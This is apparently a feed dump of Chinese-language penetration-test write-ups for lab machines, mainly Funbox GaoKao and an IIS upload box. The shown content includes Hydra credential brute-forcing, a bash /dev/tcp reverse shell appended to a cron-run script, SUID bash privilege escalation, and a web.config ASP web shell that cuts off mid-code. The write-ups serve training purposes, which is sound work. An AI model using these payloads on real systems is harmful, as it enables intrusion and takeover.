(Enumeration) 此阶段旨在发现目标并了解其开放的服务。https://7r1UMPH.github.io/post/shen-tou-ce-shi-bao-gao-%20-%20AkaRed%20%28-ce-shi-ba-ji-%29.htmlFri, 11 Apr 2025 12:55:07 +0000https://7r1UMPH.github.io/post/shen-tou-ce-shi-bao-gao-%20-%20JuMo%20%28-ce-shi-ba-ji-%29.html# 1. 简介 - 靶机名称: JuMo (未发布，内部测试靶机，可能后续发布于 HackMyVm) - 难度: 低 (Low) - 目标 IP: 192.168.205.182 (通过 arp-scan 发现) - 攻击机 IP: 192.168.205.128 - 目标: 获取目标系统的 root 权限并找到 flag。https://7r1UMPH.github.io/post/shen-tou-ce-shi-bao-gao-%20-%20JuMo%20%28-ce-shi-ba-ji-%29.htmlFri, 11 Apr 2025 01:07:08 +0000https://7r1UMPH.github.io/post/qun-zhu-ti-hou-xu-%20%60-ne%60%20-rao-guo-%20-%20-bian-liang-jie-xi-yu-%20Python%202%20%60input%28%29%60%20-de-qi-shi.html## 前言 在之前的 [WP](https://7r1umph.github.io/post/qun-zhu-ti.html) 中，我们讨论了如何通过输入非整数字符串（如 `aaa`）来绕过 Bash 脚本中 `[[ '$INPUTS' -ne '$a' ]]` 的随机数检查。https://7r1UMPH.github.io/post/qun-zhu-ti-hou-xu-%20%60-ne%60%20-rao-guo-%20-%20-bian-liang-jie-xi-yu-%20Python%202%20%60input%28%29%60%20-de-qi-shi.htmlWed, 09 Apr 2025 01:16:01 +0000https://7r1UMPH.github.io/post/eNSP%20-zai-%20Windows%2011%2024H2%20-shang-de-jian-rong-xing-wen-ti-yi-tong-guo-%20KB5053656%20-geng-xin-jie-jue.html## 问题背景 许多用户在将 Windows 11 操作系统升级到 **Version 24H2** 后，遇到了华为网络模拟平台 eNSP 无法正常工作的问题。https://7r1UMPH.github.io/post/eNSP%20-zai-%20Windows%2011%2024H2%20-shang-de-jian-rong-xing-wen-ti-yi-tong-guo-%20KB5053656%20-geng-xin-jie-jue.htmlWed, 09 Apr 2025 00:30:27 +0000https://7r1UMPH.github.io/post/hackmyvm-ba-chang--Bruteforcelab.html# 简介  靶机：[Bruteforcelab](https://hackmyvm.eu/machines/machine.php?vm=Bruteforcelab) 难度：绿色 目标 IP：192.168.205.164 本机 IP：192.168.205.128 知识点：'旨在用于练习暴力破解和 SMB 服务利用。https://7r1UMPH.github.io/post/hackmyvm-ba-chang--Bruteforcelab.htmlSat, 22 Mar 2025 13:13:19 +0000https://7r1UMPH.github.io/post/%F0%9F%8C%9F%20-zhan-dian-mei-hua-sheng-ji-wan-cheng-tong-gao.html。https://7r1UMPH.github.io/post/%F0%9F%8C%9F%20-zhan-dian-mei-hua-sheng-ji-wan-cheng-tong-gao.htmlFri, 21 Mar 2025 02:58:57 +0000https://7r1UMPH.github.io/post/vulnhub_Funbox_%20GaoKao.html# vulnhub_Funbox: GaoKao # 0.简介 **靶机**：https://vulnhub.com/entry/funbox-gaokao,707/ **难度**：绿色 **目标 IP**：192.168.205.152 **本机 IP**：192.168.205.128 # 1.扫描 ​`nmap`​起手 ``` ┌──(kali㉿kali)-[~/test] └─$ nmap -A -Pn -n --min-rate 10000 192.168.205.152 Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-09 17:56 CST Nmap scan report for 192.168.205.152 Host is up (0.00025s latency). Not shown: 996 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5e | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 ftp ftp 169 Jun 5 2021 welcome.msg 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 48:39:31:22:fb:c2:03:44:a7:4e:c0:fa:b8:ad:2f:96 (RSA) | 256 70:a7:74:5e:a3:79:60:28:1a:45:4c:ab:5c:e7:87:ad (ECDSA) |_ 256 9c:35:ce:f6:59:66:7f:ae:c4:d1:21:16:d5:aa:56:71 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: Wellcome to Funbox: Gaokao ! |_http-server-header: Apache/2.4.29 (Ubuntu) 3306/tcp open mysql MySQL 5.7.34-0ubuntu0.18.04.1 | ssl-cert: Subject: commonName=MySQL_Server_5.7.34_Auto_Generated_Server_Certificate | Not valid before: 2021-06-05T15:15:30 |_Not valid after: 2031-06-03T15:15:30 |_ssl-date: TLS randomness does not represent time | mysql-info: | Protocol: 10 | Version: 5.7.34-0ubuntu0.18.04.1 | Thread ID: 3 | Capabilities flags: 65535 | Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsTransactions, LongPassword, IgnoreSpaceBeforeParenthesis, LongColumnFlag, InteractiveClient, Speaks41ProtocolNew, ConnectWithDatabase, DontAllowDatabaseTableColumn, SwitchToSSLAfterHandshake, IgnoreSigpipes, SupportsLoadDataLocal, SupportsCompression, ODBCClient, FoundRows, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults | Status: Autocommit | Salt: w5w-\x05[lh(@\x08Zp*'=C:\x01\x10 |_ Auth Plugin Name: mysql_native_password MAC Address: 08:00:27:84:89:FF (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.25 ms 192.168.205.152 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.41 seconds ``` Gaokao可能是一个用户 # 2.踩点 ``` ┌──(kali㉿kali)-[~/test] └─$ ftp 192.168.205.152 Connected to 192.168.205.152. 220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.205.152] Name (192.168.205.152:kali): anonymous 331 Anonymous login ok, send your complete email address as your password Password: 230-Welcome, archive user anonymous@192.168.205.128 ! 230- 230-The local time is: Sun Feb 09 09:57:05 2025 230- 230-This is an experimental FTP server. If you have any unusual problems, 230-please report them via e-mail to <sky@funbox9>. 230- 230 Anonymous access granted, restrictions apply Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 229 Entering Extended Passive Mode (|||13045|) 150 Opening ASCII mode data connection for file list drwxr-xr-x 2 ftp ftp 4096 Jun 5 2021 . drwxr-xr-x 2 ftp ftp 4096 Jun 5 2021 .. -rw-r--r-- 1 ftp ftp 169 Jun 5 2021 welcome.msg 226 Transfer complete ftp> mget welcome.msg mget welcome.msg [anpqy?]? y 229 Entering Extended Passive Mode (|||48839|) 150 Opening BINARY mode data connection for welcome.msg (169 bytes) 100% |******************************************************************************************| 169 5.55 MiB/s 00:00 ETA 226 Transfer complete 169 bytes received in 00:00 (150.30 KiB/s) ftp> exit 221 Goodbye. ┌──(kali㉿kali)-[~/test] └─$ cat welcome.msg Welcome, archive user %U@%R ! The local time is: %T This is an experimental FTP server. If you have any unusual problems, please report them via e-mail to <sky@%L>. ``` sky可能是一个用户，继续 ``` ┌──(kali㉿kali)-[~/test] └─$ gobuster dir -u http://192.168.205.152 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt -x php,html,txt,md | grep -v '403' =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.205.152 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-words.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: html,txt,md,php [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /index.html (Status: 200) [Size: 10310] /. (Status: 200) [Size: 10310] ``` 就一个默认页，页面无隐藏，爆破ssh,ftp（mysql，要是真没有再说） ``` ┌──(kali㉿kali)-[~/test] └─$ hydra -L user -P /usr/share/wordlists/q5000.txt ssh://192.168.205.152 -V -I -u -f -e nsr -t 64 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-09 18:01:18 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 64 tasks per 1 server, overall 64 tasks, 10006 login tries (l:2/p:5003), ~157 tries per task [DATA] attacking ssh://192.168.205.152:22/ ``` ``` ┌──(kali㉿kali)-[~/test] └─$ hydra -L user -P /usr/share/wordlists/q5000.txt ftp://192.168.205.152 -V -I -u -f -e nsr -t 64 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-09 18:01:04 [DATA] max 64 tasks per 1 server, overall 64 tasks, 10006 login tries (l:2/p:5003), ~157 tries per task [DATA] attacking ftp://192.168.205.152:21/ [21][ftp] host: 192.168.205.152 login: sky password: thebest [STATUS] attack finished for 192.168.205.152 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-09 18:02:53 ``` ftp有结果，上去看看 ``` ┌──(kali㉿kali)-[~/test] └─$ ftp 192.168.205.152 Connected to 192.168.205.152. 220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.205.152] Name (192.168.205.152:kali): sky 331 Password required for sky Password: 230 User sky logged in Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 229 Entering Extended Passive Mode (|||39399|) 150 Opening ASCII mode data connection for file list drwxr-xr-x 3 sky sky 4096 Jun 6 2021 . drwxr-xr-x 5 root root 4096 Jun 5 2021 .. -rw------- 1 sky sky 56 Jun 5 2021 .bash_history -r--r--r-- 1 sky sky 220 Jun 5 2021 .bash_logout -r--r--r-- 1 sky sky 3771 Jun 5 2021 .bashrc -r--r--r-- 1 sky sky 807 Jun 5 2021 .profile drwxr----- 2 root root 4096 Jun 5 2021 .ssh -rwxr-x--- 1 sky sarah 66 Jun 6 2021 user.flag -rw------- 1 sky sky 1489 Jun 5 2021 .viminfo 226 Transfer complete ftp> mget * mget user.flag [anpqy?]? y 229 Entering Extended Passive Mode (|||51733|) 150 Opening BINARY mode data connection for user.flag (66 bytes) 100% |******************************************************************************************| 66 1.65 MiB/s 00:00 ETA 226 Transfer complete 66 bytes received in 00:00 (41.31 KiB/s) ftp> exit 221 Goodbye. ┌──(kali㉿kali)-[~/test] └─$ cat user.flag #!/bin/sh echo 'Your flag is:88jjggzzZhjJjkOIiu76TggHjoOIZTDsDSd' ``` 有个脚本，有点像后台脚本，我们加个shell上去试试 ``` ┌──(kali㉿kali)-[~/test] └─$ echo 'bash -i >&/dev/tcp/192.168.205.128/8888 0>&1' >> user.flag ┌──(kali㉿kali)-[~/test] └─$ ftp 192.168.205.152 Connected to 192.168.205.152. 220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.205.152] Name (192.168.205.152:kali): sky 331 Password required for sky Password: 230 User sky logged in Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 229 Entering Extended Passive Mode (|||24304|) 150 Opening ASCII mode data connection for file list drwxr-xr-x 3 sky sky 4096 Jun 6 2021 . drwxr-xr-x 5 root root 4096 Jun 5 2021 .. -rw------- 1 sky sky 56 Jun 5 2021 .bash_history -r--r--r-- 1 sky sky 220 Jun 5 2021 .bash_logout -r--r--r-- 1 sky sky 3771 Jun 5 2021 .bashrc -r--r--r-- 1 sky sky 807 Jun 5 2021 .profile drwxr----- 2 root root 4096 Jun 5 2021 .ssh -rwxr-x--- 1 sky sarah 66 Jun 6 2021 user.flag -rw------- 1 sky sky 1489 Jun 5 2021 .viminfo 226 Transfer complete ftp> put user.flag local: user.flag remote: user.flag 229 Entering Extended Passive Mode (|||53542|) 150 Opening BINARY mode data connection for user.flag 100% |******************************************************************************************| 111 2.35 MiB/s 00:00 ETA 226 Transfer complete 111 bytes sent in 00:00 (117.56 KiB/s) ``` 另外窗口监测 ``` ┌──(kali㉿kali)-[~/test] └─$ nc -lvnp 8888 listening on [any] 8888 ... connect to [192.168.205.128] from (UNKNOWN) [192.168.205.152] 52670 bash: cannot set terminal process group (-1): Inappropriate ioctl for device bash: no job control in this shell bash-4.4$ id id uid=1002(sarah) gid=1002(sarah) groups=1002(sarah) ``` # 3. 获得稳定的 Shell 获取**反向 shell** 后，通过以下命令获得稳定的**交互式** **TTY shell**： ```bash script /dev/null -c bash ctrl+z stty raw -echo; fg reset xterm export TERM=xterm echo $SHELL export SHELL=/bin/bash stty rows 59 cols 236 ``` # 4.提权 ``` bash-4.4$ sudo -l [sudo] password for sarah: bash-4.4$ ls -al total 36 dr-xr-xr-x 4 sarah sarah 4096 Jun 6 2021 . drwxr-xr-x 5 root root 4096 Jun 5 2021 .. -r--r--r-- 1 sarah sarah 220 Jun 5 2021 .bash_logout -r--r--r-- 1 sarah sarah 3771 Jun 5 2021 .bashrc dr-x------ 2 sarah sarah 4096 Jun 5 2021 .cache dr-x------ 3 sarah sarah 4096 Jun 5 2021 .gnupg -r--r--r-- 1 sarah sarah 807 Jun 5 2021 .profile -r--rw-r-- 1 sarah sarah 74 Jun 5 2021 .selected_editor -r-------- 1 sarah sarah 3214 Jun 6 2021 .viminfo bash-4.4$ cd .. bash-4.4$ ls -la total 20 drwxr-xr-x 5 root root 4096 Jun 5 2021 . drwxr-xr-x 24 root root 4096 Jun 5 2021 .. drwxr-xr-x 4 lucy lucy 4096 Jun 6 2021 lucy dr-xr-xr-x 4 sarah sarah 4096 Jun 6 2021 sarah drwxr-xr-x 3 sky sky 4096 Jun 6 2021 sky bash-4.4$ cd lucy/ bash-4.4$ ls -al total 36 drwxr-xr-x 4 lucy lucy 4096 Jun 6 2021 . drwxr-xr-x 5 root root 4096 Jun 5 2021 .. -rw------- 1 lucy lucy 192 Jun 6 2021 .bash_history -rw-r--r-- 1 lucy lucy 220 Apr 4 2018 .bash_logout -rw-r--r-- 1 lucy lucy 3771 Apr 4 2018 .bashrc drwx------ 2 lucy lucy 4096 Jun 5 2021 .cache drwx------ 3 lucy lucy 4096 Jun 5 2021 .gnupg -rw-r--r-- 1 lucy lucy 807 Apr 4 2018 .profile -rw-r--r-- 1 lucy lucy 0 Jun 5 2021 .sudo_as_admin_successful -rw------- 1 lucy lucy 702 Jun 6 2021 .viminfo bash-4.4$ cd .. bash-4.4$ ls -al total 20 drwxr-xr-x 5 root root 4096 Jun 5 2021 . drwxr-xr-x 24 root root 4096 Jun 5 2021 .. drwxr-xr-x 4 lucy lucy 4096 Jun 6 2021 lucy dr-xr-xr-x 4 sarah sarah 4096 Jun 6 2021 sarah drwxr-xr-x 3 sky sky 4096 Jun 6 2021 sky bash-4.4$ cd sky/ bash-4.4$ ls -al total 36 drwxr-xr-x 3 sky sky 4096 Jun 6 2021 . drwxr-xr-x 5 root root 4096 Jun 5 2021 .. -rw------- 1 sky sky 56 Jun 5 2021 .bash_history -r--r--r-- 1 sky sky 220 Jun 5 2021 .bash_logout -r--r--r-- 1 sky sky 3771 Jun 5 2021 .bashrc -r--r--r-- 1 sky sky 807 Jun 5 2021 .profile drwxr----- 2 root root 4096 Jun 5 2021 .ssh -rwxr-x--- 1 sky sarah 111 Feb 9 10:04 user.flag -rw------- 1 sky sky 1489 Jun 5 2021 .viminfo bash-4.4$ find / -perm -4000 -type f 2>/dev/null /bin/su /bin/fusermount /bin/ping /bin/mount /bin/umount /usr/bin/gpasswd /usr/bin/traceroute6.iputils /usr/bin/chsh /usr/bin/sudo /usr/bin/procmail /usr/bin/newgidmap /usr/bin/newuidmap /usr/bin/pkexec /usr/bin/at /usr/bin/passwd /usr/bin/newgrp /usr/bin/chfn /usr/lib/eject/dmcrypt-get-device /usr/lib/snapd/snap-confine /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic ``` 传脚本（其实是我靶机抽风了，少了个bash） ``` bash-4.4$ wget 192.168.205.128/linpeas.sh --2025-02-09 10:08:54-- http://192.168.205.128/linpeas.sh Connecting to 192.168.205.128:80... failed: Connection refused. bash-4.4$ wget 192.168.205.128/linpeas.sh --2025-02-09 10:08:59-- http://192.168.205.128/linpeas.sh Connecting to 192.168.205.128:80... connected. HTTP request sent, awaiting response... 200 OK Length: 839766 (820K) [text/x-sh] Saving to: ‘linpeas.sh’ linpeas.sh 0%[ linpeas.sh 100%[========================================================================================================================================>] 820.08K --.-KB/s in 0.003s 2025-02-09 10:08:59 (269 MB/s) - ‘linpeas.sh’ saved [839766/839766] bash-4.4$ chmod +x linpeas.sh bash-4.4$ bash linpeas.sh ``` 也没有，重装吧 ``` ┌──(kali㉿kali)-[~/test] └─$ nc -lvnp 8888 listening on [any] 8888 ... id connect to [192.168.205.128] from (UNKNOWN) [192.168.205.152] 48504 bash: cannot set terminal process group (-1): Inappropriate ioctl for device bash: no job control in this shell bash-4.4$ id uid=1002(sarah) gid=1002(sarah) groups=1002(sarah) bash-4.4$ find / -perm -4000 -type f 2>/dev/null find / -perm -4000 -type f 2>/dev/null /bin/bash /bin/su /bin/fusermount /bin/ping /bin/mount /bin/umount /usr/bin/gpasswd /usr/bin/traceroute6.iputils /usr/bin/chsh /usr/bin/sudo /usr/bin/procmail /usr/bin/newgidmap /usr/bin/newuidmap /usr/bin/pkexec /usr/bin/at /usr/bin/passwd /usr/bin/newgrp /usr/bin/chfn /usr/lib/eject/dmcrypt-get-device /usr/lib/snapd/snap-confine /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic ``` bash -p ``` bash-4.4$ bash -p bash -p id uid=1002(sarah) gid=1002(sarah) euid=0(root) egid=0(root) groups=0(root),1002(sarah) ```。https://7r1UMPH.github.io/post/vulnhub_Funbox_%20GaoKao.htmlThu, 20 Mar 2025 08:35:32 +0000https://7r1UMPH.github.io/post/thl_THLCPPT_V16-bi-ji.html# thl_THLCPPT_V16笔记 **靶机**：https://thehackerslabs.com/thlcpptv16/ **难度**：专家（EXPERTO） **目标 IP**：192.168.205.152 **本机 IP**：192.168.205.141 # 1.端口枚举及服务探测 使用 `nmap` 扫描目标 IP 的开放端口： ``` nmap 192.168.205.152 ```  访问 80 端口  点击 Ir al Examen 发现子域，分别为： 1. examen.thlcpptv16.thl 2. thlcpptv16.thl 将这两个域名添加到 `/etc/hosts` 文件中，进一步探查。https://7r1UMPH.github.io/post/thl_THLCPPT_V16-bi-ji.htmlThu, 20 Mar 2025 08:34:31 +0000https://7r1UMPH.github.io/post/thl_sinplomo98-bi-ji.html# thl_sinplomo98笔记 **靶机**：https://thehackerslabs.com/sinplomo98/ **难度**：高级（AVANZADO） **攻击ip**:192.168.205.141 **靶机ip**:192.168.205.157 # 1.端口扫描 首先使用`nmap`扫描目标机器的开放端口： ``` nmap 192.168.205.157 ```  通过扫描，发现目标机器上开放了多个端口，其中21端口（FTP服务）和5000端口（Web服务）我比较感兴趣。https://7r1UMPH.github.io/post/thl_sinplomo98-bi-ji.htmlThu, 20 Mar 2025 08:33:29 +0000https://7r1UMPH.github.io/post/thl_Offensive.html# thl_Offensive **靶机**：[thehackerslabs - offensive](https://thehackerslabs.com/offensive/) **难度**：专业（PROFESIONAL） **目标 IP**：192.168.205.220 **本机 IP**：192.168.205.141 --- ## 1. 端口枚举及服务探测 首先，使用 `nmap` 扫描目标 IP 的开放端口： ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sV -sT -O -Pn -n -p- 192.168.205.220 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-01 11:32 CST Nmap scan report for 192.168.205.220 Host is up (0.00034s latency). Not shown: 65532 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0) 80/tcp open http Apache httpd 2.4.62 ((Debian)) 8080/tcp open http Node.js Express framework MAC Address: 08:00:27:B1:A8:86 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds ``` 从 `nmap` 扫描结果来看，目标机器开放了 **22** (SSH) 、 **80** (HTTP) 端口、**8080**(HTTP) 端口。https://7r1UMPH.github.io/post/thl_Offensive.htmlThu, 20 Mar 2025 08:32:27 +0000https://7r1UMPH.github.io/post/thl_ensala-papas.html# thl_ensala-papas # 0.简介 **靶机**：[thehackerslabs - ensala-papas](https://thehackerslabs.com/ensala-papas/) **难度**：初学者 **目标 IP**：192.168.205.221 **本机 IP**：192.168.205.141 --- # 1.扫描 `nmap`起手，先探测端口 ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.221 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 11:17 CST Nmap scan report for 192.168.205.221 Host is up (0.00068s latency). Not shown: 65523 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3167/tcp filtered nowcontact 47001/tcp open winrm 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown MAC Address: 08:00:27:CE:80:73 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 11.77 seconds ``` 再探测详细服务 ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sV -sT -O -Pn -n -p80,135,139,445,47001,49152,49153,49154,49155,49156,49157 192.168.205.221 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 11:19 CST Nmap scan report for 192.168.205.221 Host is up (0.00046s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC MAC Address: 08:00:27:CE:80:73 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Microsoft Windows 7|2008|8.1 OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1 OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 Network Distance: 1 hop Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.00 seconds ``` 探测UDP服务 ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap -sU -n -T4 --top-ports 100 192.168.205.221 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 11:27 CST Nmap scan report for 192.168.205.221 Host is up (0.00048s latency). Not shown: 62 closed udp ports (port-unreach), 37 open|filtered udp ports (no-response) PORT STATE SERVICE 137/udp open netbios-ns MAC Address: 08:00:27:CE:80:73 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 69.21 seconds ``` 使用`nmap`扫描漏洞 ```bash ┌──(kali㉿kali)-[~/test] └─$ nmap --script=vuln -p80,135,139,445,47001,49152,49153,49154,49155,49156,49157 192.168.205.221 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 11:24 CST Nmap scan report for 192.168.205.221 Host is up (0.00056s latency). PORT STATE SERVICE 80/tcp open http |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 47001/tcp open winrm 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown MAC Address: 08:00:27:CE:80:73 (Oracle VirtualBox virtual NIC) Host script results: |_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR |_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR |_smb-vuln-ms10-054: false Nmap done: 1 IP address (1 host up) scanned in 148.15 seconds ``` 目前为止，感兴趣的端口有 **80**、**445，** windwos的靶机445的优先级高于80，所以我们先测试445端口有没有利用点 --- # 2.踩点 ## 2.1 port 445 ```bash ┌──(kali㉿kali)-[~/test] └─$ netexec smb 192.168.205.221 -u guest -p '' --shares SMB 192.168.205.221 445 WIN-4QU3QNHNK7E [*] Windows 6.1 Build 7600 x64 (name:WIN-4QU3QNHNK7E) (domain:WIN-4QU3QNHNK7E) (signing:False) (SMBv1:False) SMB 192.168.205.221 445 WIN-4QU3QNHNK7E [-] WIN-4QU3QNHNK7E\guest: STATUS_LOGON_FAILURE ``` 它没有开放访客登录，所以可以直接去观察80端口了 ## 2.2 port 80 ```bash ┌──(kali㉿kali)-[~/test] └─$ gobuster dir -u http://192.168.205.221 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x aspx,asp,html,txt,md -b 404 =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.205.221 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: asp,html,txt,md,aspx [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /*checkout*.aspx (Status: 400) [Size: 20] /zoc.aspx (Status: 200) [Size: 1159] /*docroot*.aspx (Status: 400) [Size: 20] /*.aspx (Status: 400) [Size: 20] /http%3A%2F%2Fwww.aspx (Status: 400) [Size: 20] /**http%3a.aspx (Status: 400) [Size: 20] /q%26a.aspx (Status: 400) [Size: 20] /http%3A.aspx (Status: 400) [Size: 20] /*http%3A.aspx (Status: 400) [Size: 20] /http%3A%2F%2Fyoutube.aspx (Status: 400) [Size: 20] /http%3A%2F%2Fblogs.aspx (Status: 400) [Size: 20] Progress: 345575 / 7642998 (4.52%)^C [!] Keyboard interrupt detected, terminating. Progress: 345933 / 7642998 (4.53%) =============================================================== Finished =============================================================== ``` 扫到一个`/zoc.aspx`，去浏览器查看了一下，是一个上传页，并在注释发现了一个目录路径`/Subiditosdetono/`，当我们把目录加入网址会看到如下内容  我们可以看到有一个`config`文件，当我们点击时会发现**404**无法访问，那我们还是回上传页试试能不能上传**shell**  不允许我们上传`.aspx`后缀的文件，根据之前访问`/Subiditosdetono/`看到有`config`文件，我们可以从中知道，可以上传`config`文件，我们去[hacktricks](https://book.hacktricks.xyz/)搜索一下看`config`文件可不可以做`shell`  找到了一点有意思的东西，我们把它的示例[复制](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)下来，上传运行 ```bash ┌──(kali㉿kali)-[~/test] └─$ cat web.config <?xml version='1.0' encoding='UTF-8'?> <configuration> <system.webServer> <handlers accessPolicy='Read, Script, Write'> <add name='web_config' path='*.config' verb='*' modules='IsapiModule' scriptProcessor='%windir%\system32\inetsrv\asp.dll' resourceType='Unspecified' requireAccess='Write' preCondition='bitness64' /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension='.config' /> </fileExtensions> <hiddenSegments> <remove segment='web.config' /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <!-- <% Response.write('-'&'->')%> <% Set oScript = Server.CreateObject('WSCRIPT.SHELL') Set oScriptNet = Server.CreateObject('WSCRIPT.NETWORK') Set oFileSys = Server.CreateObject('Scripting.FileSystemObject') Function getCommandOutput(theCommand) Dim objShell, objCmdExec Set objShell = CreateObject('WScript.Shell') Set objCmdExec = objshell.exec(thecommand) getCommandOutput = objCmdExec.StdOut.ReadAll end Function %> <BODY> <FORM action='' method='GET'> <input type='text' name='cmd' size=45 value='<%= szCMD %>'> <input type='submit' value='Run'> </FORM> <PRE> <%= '\\' & oScriptNet.ComputerName & '\' & oScriptNet.UserName %> <%Response.Write(Request.ServerVariables('server_name'))%> <p> <b>The server's port:</b> <%Response.Write(Request.ServerVariables('server_port'))%> </p> <p> <b>The server's software:</b> <%Response.Write(Request.ServerVariables('server_software'))%> </p> <p> <b>The server's software:</b> 